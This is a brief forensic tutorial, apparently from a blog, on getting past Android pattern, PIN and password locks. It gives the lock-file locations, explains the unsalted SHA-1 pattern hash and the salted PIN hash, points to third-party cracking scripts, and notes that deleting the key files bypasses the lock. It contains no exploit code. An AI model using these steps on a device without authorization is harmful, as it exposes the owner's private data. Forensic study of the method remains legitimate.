Extracting data from a locked Android device
Today we are going to talk about unlocking Android mobile devices. There are two main types of locks: Pattern and PIN/Password. To crack it, a forensic examiner need to extract one or two files from the mobile device. Of course, there is no universal solution, but there are three main options:
- To use Android Debug Bridge. The mobile device being examined must be rooted and USB debugging must be enabled.
- To flash a custom recovery. The device’s bootloader must be unlocked.
- To use JTAG or Chip-off techniques.
To crack Pattern lock you need just one file, located at /data/system/. The filename is gesture.key. This file contains an unsalted SHA-1 hash of device Pattern lock. The number of patterns is limited due to each number (0 – 8) can be used only once. To crack it a rainbow table with all possible variations need to be created. We are not going to reinvent the wheel, because talented digital forensics analysts from CCL have already created a Python 3 script, that can solve the problem. You can download it here. Run the script and in about 30 minutes you’ll get an sqlite database with all possible pattern hash variants. Now you can search the DB for hash extracted from your gesture.key file.
To crack PIN or password you need two files. The first file is password.key, located at /data/system/, the second – settings.db (for Android prior to 4.4), located at /data/data/com.android.providers.settings/databases/, or locksettings.db (for Android 4.4 and higher), located at /data/system/. We need two files instead one, because this time the hash is salted. In settings.db the salt can be found in the “secure” table, in locksettings.db – in the “locksettings” table. Use your favourite SQL browser to find the lockscreen.password_salt key. Of course, if you are a hex editor addict, you can use your favourite tool. Now it’s time to use oldy-moldy brute-force. And again, CCL has a Python 3 script to solve the problem. It can be downloaded here. To start cracking, you should run the script with filled in the hash, the salt and max code length (4 – 16).
To tell the truth, you don’t even need to crack Pattern, PIN or password. You can bypass it by deleting the relevant files. Of course, it’s not forensically sound. Nevertheless, this is the only way to bypass Lollipop devices locks.